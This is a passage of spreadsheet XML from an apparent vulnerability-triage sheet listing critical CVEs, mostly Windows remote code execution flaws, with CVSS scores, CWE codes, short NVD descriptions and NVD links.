      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69590</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69595</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69715</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69730</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69768</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69769</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69819</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69824</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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2" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71374</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data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S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71376</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>OS command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S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71377</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>Command Argument Injection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through 11-00-12, from 09-87 before 09-87-10, from 09-80 through 09-80-04, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72982</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72983</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
